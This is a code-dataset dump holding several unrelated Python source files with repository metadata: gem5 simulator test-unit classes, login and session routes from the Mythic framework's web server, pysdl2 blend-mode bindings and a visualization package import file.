| 48 | 2016-12-08T12:03:13.000Z | 2022-02-16T09:16:13.000Z | #!/usr/bin/env python2.7
#
# Copyright (c) 2016 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Sandberg
from abc import ABCMeta, abstractmethod
from datetime import datetime
import difflib
import functools
import os
import re
import subprocess
import sys
import traceback
from results import UnitResult
from helpers import *
_test_base = os.path.join(os.path.dirname(__file__), "..")
class TestUnit(object):
"""Base class for all test units.
A test unit is a part of a larger test case. Test cases usually
contain two types of units, run units (run gem5) and verify units
(diff output files). All unit implementations inherit from this
class.
A unit implementation overrides the _run() method. The test runner
calls the run() method, which wraps _run() to protect against
exceptions.
"""
__metaclass__ = ABCMeta
def __init__(self, name, ref_dir, test_dir, skip=False):
self.name = name
self.ref_dir = ref_dir
self.test_dir = test_dir
self.force_skip = skip
self.start_time = None
self.stop_time = None
def result(self, state, **kwargs):
if self.start_time is not None and "runtime" not in kwargs:
self.stop_time = datetime.utcnow()
delta = self.stop_time - self.start_time
kwargs["runtime"] = delta.total_seconds()
return UnitResult(self.name, state, **kwargs)
def ok(self, **kwargs):
return self.result(UnitResult.STATE_OK, **kwargs)
def skip(self, **kwargs):
return self.result(UnitResult.STATE_SKIPPED, **kwargs)
def error(self, message, **kwargs):
return self.result(UnitResult.STATE_ERROR, message=message, **kwargs)
def failure(self, message, **kwargs):
return self.result(UnitResult.STATE_FAILURE, message=message, **kwargs)
def ref_file(self, fname):
return os.path.join(self.ref_dir, fname)
def out_file(self, fname):
return os.path.join(self.test_dir, fname)
def _read_output(self, fname, default=""):
try:
with open(self.out_file(fname), "r") as f:
return f.read()
except IOError:
return default
def run(self):
self.start_time = datetime.utcnow()
try:
if self.force_skip:
return self.skip()
else:
return self._run()
except:
return self.error("Python exception:\n%s" % traceback.format_exc())
@abstractmethod
def _run(self):
pass
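# --- Editor's illustration (not part of the original file) ---
# A minimal TestUnit subclass only needs to override _run() and report its outcome
# through the helper methods (ok/skip/error/failure), e.g.:
#
#   class AlwaysPass(TestUnit):
#       def __init__(self, **kwargs):
#           super(AlwaysPass, self).__init__("always_pass", **kwargs)
#       def _run(self):
#           return self.ok(stdout="nothing to verify")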
class RunGem5(TestUnit):
"""Test unit representing a gem5 run.
Possible failure modes:
- gem5 failed to run -> STATE_ERROR
- timeout -> STATE_ERROR
- non-zero exit code -> STATE_ERROR
Possible non-failure results:
- exit code == 0 -> STATE_OK
- exit code == 2 -> STATE_SKIPPED
"""
def __init__(self, gem5, gem5_args, timeout=0, **kwargs):
super(RunGem5, self).__init__("gem5", **kwargs)
self.gem5 = gem5
self.args = gem5_args
self.timeout = timeout
def _run(self):
gem5_cmd = [
self.gem5,
"-d", self.test_dir,
"--stats-file", "text://stats.txt?desc=False",
"-re",
] + self.args
try:
with ProcessHelper(gem5_cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
status, gem5_stdout, gem5_stderr = p.call(timeout=self.timeout)
except CallTimeoutException as te:
return self.error("Timeout", stdout=te.stdout, stderr=te.stderr)
except OSError as ose:
return self.error("Failed to launch gem5: %s" % ose)
stderr = "\n".join([
"*** gem5 stderr ***",
gem5_stderr,
"",
"*** m5out/simerr ***",
self._read_output("simerr"),
])
stdout = "\n".join([
"*** gem5 stdout ***",
gem5_stdout,
"",
"*** m5out/simout ***",
self._read_output("simout"),
])
# Signal
if status < 0:
return self.error("gem5 terminated by signal %i" % (-status, ),
stdout=stdout, stderr=stderr)
elif status == 2:
return self.skip(stdout=stdout, stderr=stderr)
elif status > 0:
return self.error("gem5 exited with non-zero status: %i" % status,
stdout=stdout, stderr=stderr)
else:
return self.ok(stdout=stdout, stderr=stderr)
class DiffOutFile(TestUnit):
"""Test unit comparing and output file and a reference file."""
# regular expressions of lines to ignore when diffing outputs
diff_ignore_regexes = {
"simout" : [
re.compile('^Redirecting (stdout|stderr) to'),
re.compile('^gem5 compiled '),
re.compile('^gem5 started '),
re.compile('^gem5 executing on '),
re.compile('^command line:'),
re.compile("^Couldn't import dot_parser,"),
re.compile("^info: kernel located at:"),
re.compile("^Couldn't unlink "),
re.compile("^Using GPU kernel code file\(s\) "),
],
"simerr" : [
#re.compile('^Simulation complete at'),
],
"config.ini" : [
re.compile("^(executable|readfile|kernel|image_file)="),
re.compile("^(cwd|input|codefile)="),
],
"config.json" : [
re.compile(r'''^\s*"(executable|readfile|kernel|image_file)":'''),
re.compile(r'''^\s*"(cwd|input|codefile)":'''),
],
}
def __init__(self, fname, **kwargs):
super(DiffOutFile, self).__init__("diff[%s]" % fname,
**kwargs)
self.fname = fname
self.line_filters = DiffOutFile.diff_ignore_regexes.get(fname, tuple())
def _filter_file(self, fname):
def match_line(l):
for r in self.line_filters:
if r.match(l):
return True
return False
with open(fname, "r") as f:
for l in f:
if not match_line(l):
yield l
def _run(self):
fname = self.fname
ref = self.ref_file(fname)
out = self.out_file(fname)
if not os.path.exists(ref):
return self.error("%s doesn't exist in reference directory" \
% fname)
if not os.path.exists(out):
return self.error("%s doesn't exist in output directory" % fname)
diff = difflib.unified_diff(
tuple(self._filter_file(ref)),
tuple(self._filter_file(out)),
fromfile="ref/%s" % fname, tofile="out/%s" % fname)
diff = list(diff)
if diff:
return self.error("ref/%s and out/%s differ" % (fname, fname),
stderr="".join(diff))
else:
return self.ok(stdout="-- ref/%s and out/%s are identical --" \
% (fname, fname))
class DiffStatFile(TestUnit):
"""Test unit comparing two gem5 stat files."""
def __init__(self, **kwargs):
super(DiffStatFile, self).__init__("stat_diff", **kwargs)
self.stat_diff = os.path.join(_test_base, "diff-out")
def _run(self):
STATUS_OK = 0
STATUS_NEW_STATS = 1
STATUS_FAILED = 2
stats = "stats.txt"
cmd = [
self.stat_diff,
self.ref_file(stats), self.out_file(stats),
]
with ProcessHelper(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
status, stdout, stderr = p.call()
if status in (STATUS_OK, STATUS_NEW_STATS):
return self.ok(stdout=stdout, stderr=stderr)
elif status == STATUS_FAILED:
return self.failure("Statistics mismatch",
stdout=stdout, stderr=stderr)
else:
return self.error("diff-out returned an error: %i" % status,
stdout=stdout, stderr=stderr)
| 34.689189 | 79 | 0.602357 | 7,852 | 0.764706 | 312 | 0.030386 | 48 | 0.004675 | 0 | 0 | 4,017 | 0.391215 |
9091ee961b1819c72143e6265ce0d0dcec7d5ad2 | 19,042 | py | Python | mythic-docker/app/routes/routes.py | rmusser01/Mythic | 48d3f6b0b1bbb4858e5f43a5c6528644b0751bc9 | [
"BSD-3-Clause"
]
| 934 | 2020-08-13T15:32:30.000Z | 2022-03-31T20:41:21.000Z | mythic-docker/app/routes/routes.py | rmusser01/Mythic | 48d3f6b0b1bbb4858e5f43a5c6528644b0751bc9 | [
"BSD-3-Clause"
]
| 88 | 2020-08-13T18:59:11.000Z | 2022-03-31T23:48:18.000Z | mythic-docker/app/routes/routes.py | rmusser01/Mythic | 48d3f6b0b1bbb4858e5f43a5c6528644b0751bc9 | [
"BSD-3-Clause"
]
| 161 | 2020-08-13T17:28:03.000Z | 2022-03-19T14:56:34.000Z | from app import (
mythic,
links,
nginx_port,
listen_port,
mythic_admin_password,
mythic_admin_user,
default_operation_name,
mythic_db
)
import app
import asyncpg
import redis
from peewee_async import Manager
from sanic.response import json
from sanic import response
from sanic.exceptions import (
NotFound,
Unauthorized,
MethodNotSupported,
SanicException,
RequestTimeout,
)
import sys
from jinja2 import Environment, PackageLoader
from app.database_models.model import (
Operator,
Operation,
OperatorOperation,
ATTACK,
Artifact,
)
import datetime
import app.crypto as crypto
from sanic_jwt import BaseEndpoint, utils, exceptions
from sanic_jwt.decorators import scoped, inject_user
import ujson as js
from ipaddress import ip_address
from app.routes.authentication import invalidate_refresh_token
import app.database_models.model as db_model
from sanic.log import logger
from uuid import uuid4
import asyncio
env = Environment(loader=PackageLoader("app", "templates"), autoescape=True)
async def respect_pivot(my_links, request):
# given the links dictionary, update the server_ip and server_port to match what was received
# this will allow people using pivots (127.0.0.1:8888) to still access things going through to IP:other_port
updated_links = my_links
host_field = request.host.split(":")
if len(host_field) == 1:
server_ip = host_field[0]
if 'x-forwarded-port' in request.headers:
server_port = request.headers["x-forwarded-port"]
else:
if request.scheme == "https":
server_port = nginx_port
else:
server_port = listen_port
else:
server_ip = host_field[0]
server_port = host_field[1]
updated_links["server_ip"] = server_ip
updated_links["server_port"] = server_port
updated_links["login"] = "/login"
return updated_links
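# Editor's note (illustrative example, not part of the original module): with a pivot such
# as an SSH tunnel on 127.0.0.1:8888, a request arriving with Host "127.0.0.1:8888" makes
# respect_pivot() set links["server_ip"] = "127.0.0.1" and links["server_port"] = "8888",
# so URLs rendered into templates keep pointing back through the pivot instead of at the
# server's real address.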
async def getSchemes(request):
if 'x-forwarded-proto' in request.headers:
if request.headers['x-forwarded-proto'] == "http":
return {"http": "http", "ws": "ws"}
else:
return {"http": "https", "ws": "wss"}
if request.scheme == "http":
return {"http": "http", "ws": "ws"}
else:
return {"http": "https", "ws": "wss"}
@mythic.route("/")
@inject_user()
@scoped("auth:user")
async def index(request, user):
template = env.get_template("main_page.html")
content = template.render(
name=user["username"],
links=await respect_pivot(links, request),
current_operation=user["current_operation"],
config=user["ui_config"],
view_utc_time=user["view_utc_time"],
** await getSchemes(request)
)
return response.html(content)
class Login(BaseEndpoint):
async def get(self, request):
error = ""
template = env.get_template("login.html")
content = template.render(
links=await respect_pivot(links, request),
error=error,
config={},
view_utc_time=False,
** await getSchemes(request)
)
return response.html(content)
async def post(self, request):
form = request.form
error = ""
username = None
ip = request.headers["x-real-ip"] if "x-real-ip" in request.headers else request.ip
from app.api.operation_api import send_all_operations_message
try:
username = form["username"][0] if 'username' in form and len(form['username']) > 0 else ""
password = form["password"][0] if 'password' in form and len(form['password']) > 0 else ""
user = await app.db_objects.get(db_model.operator_query, username=username)
if user.id == 1 and user.failed_login_count > 10 and (user.last_failed_login_timestamp
> datetime.datetime.utcnow() + datetime.timedelta(seconds=-60)):
# throttle their attempts to log in to 1 min between checks
error = "Too many failed login attempts, try again later"
user.failed_login_count += 1
user.last_failed_login_timestamp = datetime.datetime.utcnow()
await app.db_objects.update(user)
await send_all_operations_message(message=f"Throttling login attempts for {user.username} due to too many failed login attempts\nLast connection from {ip}",
level="warning", source="throttled_login_" + user.username)
elif not user.active:
error = "Account is not active, cannot log in"
await send_all_operations_message(message=f"Deactivated account {user.username} trying to log in from {ip}",
level="warning", source="deactivated_login_" + user.username)
elif await user.check_password(password):
try:
# update the last login time to be now
user.last_login = datetime.datetime.utcnow()
user.failed_login_count = 0
await app.db_objects.update(user)
if user.current_operation is not None:
# update that operations' event log that the user just signed in
await app.db_objects.create(
db_model.OperationEventLog,
operator=None,
operation=user.current_operation,
message="{} signed in from {}".format(user.username, ip),
)
(
access_token,
output,
) = await self.responses.get_access_token_output(
request,
{"user_id": user.id, "auth": "cookie"},
self.config,
self.instance,
)
refresh_token = (
await self.instance.auth.generate_refresh_token(
request, {"user_id": user.id, "auth": "cookie"}
)
)
output.update(
{self.config.refresh_token_name(): refresh_token}
)
template = env.get_template("login.html")
content = template.render(
links=await respect_pivot(links, request),
error=error,
access_token=access_token,
** await getSchemes(request),
refresh_token=refresh_token,
config={},
view_utc_time=False,
)
resp = response.html(content)
# resp = response.redirect("/")
resp.cookies[
self.config.cookie_access_token_name()
] = access_token
resp.cookies[self.config.cookie_access_token_name()][
"httponly"
] = True
resp.cookies[self.config.cookie_access_token_name()][
"samesite"
] = "strict"
resp.cookies[
self.config.cookie_refresh_token_name()
] = refresh_token
resp.cookies[self.config.cookie_refresh_token_name()][
"httponly"
] = True
resp.cookies[self.config.cookie_refresh_token_name()][
"samesite"
] = "strict"
return resp
except Exception as e:
print(str(sys.exc_info()[-1].tb_lineno) + " " + str(e))
logger.error("post login error:" + str(e))
else:
# user exists, but password is wrong
error = "Username or password invalid"
user.failed_login_count += 1
if user.failed_login_count >= 10 and user.active:
user.last_failed_login_timestamp = datetime.datetime.utcnow()
if user.id != 1:
user.active = False
await send_all_operations_message(message=f"Deactivating account {user.username} due to too many failed logins.\nLast connection from {ip}",
level="warning")
await app.db_objects.update(user)
except Exception as e:
if username is not None:
logger.warning("login error: " + str(e))
error = "Username or password invalid"
await send_all_operations_message(message=f"Attempt to login with unknown user: {username}, from {ip}",
level="warning", source="unknown_login" + ip)
template = env.get_template("login.html")
content = template.render(
links=await respect_pivot(links, request),
error=error,
config={},
view_utc_time=False,
** await getSchemes(request)
)
return response.html(content)
class UIRefresh(BaseEndpoint):
async def get(self, request, *args, **kwargs):
# go here if we're in the browser and our JWT expires so we can update it and continue on
payload = self.instance.auth.extract_payload(request, verify=True)
try:
user = await utils.call(
self.instance.auth.retrieve_user, request, payload=payload
)
except exceptions.MeEndpointNotSetup:
raise exceptions.RefreshTokenNotImplemented
user_id = await self.instance.auth._get_user_id(user)
refresh_token = await utils.call(
self.instance.auth.retrieve_refresh_token,
request=request,
user_id=user_id,
)
if isinstance(refresh_token, bytes):
refresh_token = refresh_token.decode("utf-8")
token = await self.instance.auth.retrieve_refresh_token_from_request(request)
if refresh_token != token:
raise exceptions.AuthenticationFailed()
access_token, output = await self.responses.get_access_token_output(
request, user, self.config, self.instance
)
redirect_to = (
request.headers["referer"] if "referer" in request.headers else "/"
)
resp = response.redirect(redirect_to)
resp.cookies[self.config.cookie_access_token_name()] = access_token
resp.cookies[self.config.cookie_access_token_name()]["httponly"] = True
return resp
@mythic.route("/settings", methods=["GET"])
@inject_user()
@scoped("auth:user")
async def settings(request, user):
template = env.get_template("settings.html")
try:
content = template.render(
links=await respect_pivot(links, request),
name=user["username"],
** await getSchemes(request),
config=user["ui_config"],
view_utc_time=user["view_utc_time"],
)
return response.html(content)
except Exception as e:
logger.error(str(e))
return json({"status": "error", "error": "Failed to find operator"})
@mythic.route("/logout")
@inject_user()
@scoped("auth:user")
async def logout(request, user):
resp = response.redirect("/login")
del resp.cookies["access_token"]
del resp.cookies["refresh_token"]
operator = await app.db_objects.get(db_model.operator_query, id=user["id"])
if operator.current_operation is not None:
await app.db_objects.create(
db_model.OperationEventLog,
operator=None,
operation=operator.current_operation,
message="{} signed out".format(operator.username),
)
# now actually invalidate tokens
await invalidate_refresh_token(user["id"])
return resp
@mythic.exception(asyncio.CancelledError)
async def handle_cancellation(request, exception):
logger.info(
"Request {} was cancelled".format(str(request))
)
return json({"status": "error", "error": "Request was cancelled"}, status=500)
@mythic.exception(NotFound)
async def handler_404(request, exception):
return json({"status": "error", "error": "Not Found"}, status=404)
@mythic.exception(MethodNotSupported)
async def handler_405(request, exception):
return json({"status": "error", "error": "Session Expired, refresh"}, status=405)
@mythic.exception(RequestTimeout)
def request_timeout(request, exception):
return json({"status": "error", "error": "request timeout"})
@mythic.exception(exceptions.AuthenticationFailed)
async def handler_auth_failed(request, exception):
if "/new" in request.path or "webhook" in request.path or "/auth" in request.path or "/refresh" in request.path:
return json({"status": "error", "error": "Authentication failed", "message": "access-denied", "code": "access-denied"}, status=401)
else:
return response.redirect("/login")
@mythic.exception(Unauthorized)
async def handler_unauthorized(request, exception):
if "/new" in request.path or "webhook" in request.path or "/auth" in request.path or "/refresh" in request.path:
return json({"status": "error", "error": "Authentication failed", "message": "Unauthorized", "code": "forbidden"}, status=403)
else:
return response.redirect("/login")
@mythic.exception(SanicException)
def catch_all(request, exception):
logger.exception(
"Caught random exception within Mythic: {}, {}".format(exception, str(request))
)
return json({"status": "error", "error": "Mythic encountered an error"}, status=500)
@mythic.middleware("request")
async def check_ips(request):
if (
request.path in ["/login", "/auth", "/"]
or "/payloads/download/" in request.path
):
ip = ip_address(request.headers["x-real-ip"] if "x-real-ip" in request.headers else request.ip)
for block in mythic.config["ALLOWED_IPS"]:
if ip in block:
return
return json({"error": "Not Found"}, status=404)
@mythic.middleware("response")
async def add_cors(request, response):
response.headers["Access-Control-Allow-Headers"] = "authorization,content-type"
@mythic.listener("before_server_start")
async def setup_initial_info(sanic, loop):
logger.info("setup_initial_info")
app.db_objects = Manager(mythic_db, loop=loop)
await mythic_db.connect_async(loop=loop)
app.db_objects.database.allow_sync = True # logging.WARNING
await initial_setup()
asyncio.create_task(app.api.rabbitmq_api.start_listening())
async def initial_setup():
# create mythic_admin
import multiprocessing
try:
max_worker_connection = int(200 / (multiprocessing.cpu_count() + 1))
app.websocket_pool = await asyncpg.create_pool(mythic.config["DB_POOL_ASYNCPG_CONNECT_STRING"],
max_size=max_worker_connection)
# redis automatically creates a pool behind the scenes
app.redis_pool = redis.Redis(host=app.redis_host, port=app.redis_port, db=3)
# clear the database on start
keys = app.redis_pool.keys("*")
for k in keys:
app.redis_pool.delete(k)
operators = await app.db_objects.count(Operator.select())
if operators > 0:
logger.info("Users already exist, aborting initial install")
return
salt = str(uuid4())
password = await crypto.hash_SHA512(salt + mythic_admin_password)
try:
admin, created = await app.db_objects.get_or_create(
Operator, username=mythic_admin_user, password=password, admin=True, active=True, salt=salt
)
except Exception as e:
print(e)
return
logger.info("Created Admin")
# create default operation
operation, created = await app.db_objects.get_or_create(
Operation,
name=default_operation_name,
admin=admin,
complete=False,
)
logger.info("Created Operation")
await app.db_objects.get_or_create(
OperatorOperation, operator=admin, operation=operation
)
admin.current_operation = operation
await app.db_objects.update(admin)
logger.info("Registered Admin with the default operation")
logger.info("Started parsing ATT&CK data...")
file = open("./app/default_files/other_info/attack.json", "r")
attack = js.load(file) # this is a lot of data and might take a hot second to load
for obj in attack["techniques"]:
await app.db_objects.create(ATTACK, **obj)
file.close()
logger.info("Created all ATT&CK entries")
file = open("./app/default_files/other_info/artifacts.json", "r")
artifacts_file = js.load(file)
for artifact in artifacts_file["artifacts"]:
await app.db_objects.get_or_create(
Artifact, name=artifact["name"], description=artifact["description"]
)
file.close()
logger.info("Created all base artifacts")
logger.info("Successfully finished initial setup")
except Exception as e:
from app.api.operation_api import send_all_operations_message
asyncio.create_task(
send_all_operations_message(
message=f"Worker failed to initialize:\n {str(e)}",
level="warning"))
# /static serves out static images and files
mythic.static("/static", "./app/static", name="shared_files")
mythic.static("/favicon.ico", "./app/static/favicon.ico", name="favicon")
mythic.static("/strict_time.png", "./app/static/strict_time.png", name="strict_time")
mythic.static(
"/grouped_output.png", "./app/static/grouped_output.png", name="grouped_output"
)
mythic.static(
"/no_cmd_output.png", "./app/static/no_cmd_output.png", name="no_cmd_output"
)
mythic.static("/add_comment.png", "./app/static/add_comment.png", name="add_comment")
# add links to the routes in this file at the bottom
links["index"] = mythic.url_for("index")
links["login"] = links["WEB_BASE"] + "/login"
links["logout"] = mythic.url_for("logout")
links["settings"] = mythic.url_for("settings")
| 41.21645 | 173 | 0.589014 | 8,237 | 0.43257 | 0 | 0 | 4,549 | 0.238893 | 16,022 | 0.841403 | 3,940 | 0.206911 |
9092b9fc5566c9c58a04dd93c04224cbbceb0b64 | 1,911 | py | Python | sdl2/blendmode.py | namelivia/py-sdl2 | c1bdf43501224d5f0a125dbce70198100ec7be82 | [
"CC0-1.0"
]
| 222 | 2017-08-19T00:51:59.000Z | 2022-02-05T19:39:33.000Z | sdl2/blendmode.py | namelivia/py-sdl2 | c1bdf43501224d5f0a125dbce70198100ec7be82 | [
"CC0-1.0"
]
| 103 | 2017-08-20T17:13:05.000Z | 2022-02-05T20:20:01.000Z | sdl2/blendmode.py | namelivia/py-sdl2 | c1bdf43501224d5f0a125dbce70198100ec7be82 | [
"CC0-1.0"
]
| 54 | 2017-08-20T17:13:00.000Z | 2022-01-14T23:51:13.000Z | from ctypes import c_int
from .dll import _bind
__all__ = [
# Enums
"SDL_BlendMode",
"SDL_BLENDMODE_NONE", "SDL_BLENDMODE_BLEND", "SDL_BLENDMODE_ADD",
"SDL_BLENDMODE_MOD", "SDL_BLENDMODE_MUL", "SDL_BLENDMODE_INVALID",
"SDL_BlendOperation",
"SDL_BLENDOPERATION_ADD", "SDL_BLENDOPERATION_SUBTRACT",
"SDL_BLENDOPERATION_REV_SUBTRACT", "SDL_BLENDOPERATION_MINIMUM",
"SDL_BLENDOPERATION_MAXIMUM",
"SDL_BlendFactor",
"SDL_BLENDFACTOR_ZERO", "SDL_BLENDFACTOR_ONE",
"SDL_BLENDFACTOR_SRC_COLOR", "SDL_BLENDFACTOR_ONE_MINUS_SRC_COLOR",
"SDL_BLENDFACTOR_SRC_ALPHA", "SDL_BLENDFACTOR_ONE_MINUS_SRC_ALPHA",
"SDL_BLENDFACTOR_DST_COLOR", "SDL_BLENDFACTOR_ONE_MINUS_DST_COLOR",
"SDL_BLENDFACTOR_DST_ALPHA", "SDL_BLENDFACTOR_ONE_MINUS_DST_ALPHA",
# Functions
"SDL_ComposeCustomBlendMode"
]
SDL_BlendMode = c_int
SDL_BLENDMODE_NONE = 0x00000000
SDL_BLENDMODE_BLEND = 0x00000001
SDL_BLENDMODE_ADD = 0x00000002
SDL_BLENDMODE_MOD = 0x00000004
SDL_BLENDMODE_MUL = 0x00000008
SDL_BLENDMODE_INVALID = 0x7FFFFFFF
SDL_BlendOperation = c_int
SDL_BLENDOPERATION_ADD = 0x1
SDL_BLENDOPERATION_SUBTRACT = 0x2
SDL_BLENDOPERATION_REV_SUBTRACT = 0x3
SDL_BLENDOPERATION_MINIMUM = 0x4
SDL_BLENDOPERATION_MAXIMUM = 0x5
SDL_BlendFactor = c_int
SDL_BLENDFACTOR_ZERO = 0x1
SDL_BLENDFACTOR_ONE = 0x2
SDL_BLENDFACTOR_SRC_COLOR = 0x3
SDL_BLENDFACTOR_ONE_MINUS_SRC_COLOR = 0x4
SDL_BLENDFACTOR_SRC_ALPHA = 0x5
SDL_BLENDFACTOR_ONE_MINUS_SRC_ALPHA = 0x6
SDL_BLENDFACTOR_DST_COLOR = 0x7
SDL_BLENDFACTOR_ONE_MINUS_DST_COLOR = 0x8
SDL_BLENDFACTOR_DST_ALPHA = 0x9
SDL_BLENDFACTOR_ONE_MINUS_DST_ALPHA = 0xA
SDL_ComposeCustomBlendMode = _bind("SDL_ComposeCustomBlendMode", [SDL_BlendFactor, SDL_BlendFactor, SDL_BlendOperation, SDL_BlendFactor, SDL_BlendFactor, SDL_BlendOperation], SDL_BlendMode, added='2.0.6')
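# --- Editor's illustrative sketch (not part of the original binding module) ---
# With SDL >= 2.0.6, a custom blend mode can be composed from the factors/operations
# above; the returned SDL_BlendMode can then be handed to e.g. SDL_SetRenderDrawBlendMode
# (defined in sdl2.render). For instance, a "premultiplied alpha over" mode:
#
#   custom_mode = SDL_ComposeCustomBlendMode(
#       SDL_BLENDFACTOR_ONE, SDL_BLENDFACTOR_ONE_MINUS_SRC_ALPHA, SDL_BLENDOPERATION_ADD,
#       SDL_BLENDFACTOR_ONE, SDL_BLENDFACTOR_ONE_MINUS_SRC_ALPHA, SDL_BLENDOPERATION_ADD)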
| 31.327869 | 204 | 0.791209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 695 | 0.363684 |
9093d4d8bd3bc3c9e386b961c6079deedbc45036 | 204 | py | Python | python_code/cutils/viz/__init__.py | IBM/oct-glaucoma-vf-estimate | ea79352547f33fe05ee532ab9faad6a5e4811a76 | [
"Apache-2.0"
]
| null | null | null | python_code/cutils/viz/__init__.py | IBM/oct-glaucoma-vf-estimate | ea79352547f33fe05ee532ab9faad6a5e4811a76 | [
"Apache-2.0"
]
| null | null | null | python_code/cutils/viz/__init__.py | IBM/oct-glaucoma-vf-estimate | ea79352547f33fe05ee532ab9faad6a5e4811a76 | [
"Apache-2.0"
]
| null | null | null | from .vizutils import viz_overlaymask, display_side2side, display_side2sidev1, stack_patches, figure2image, get_heatmap, visualize_probmaps
from .vizutils import get_heatmap_multiple, figure2image_save | 68 | 140 | 0.872549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |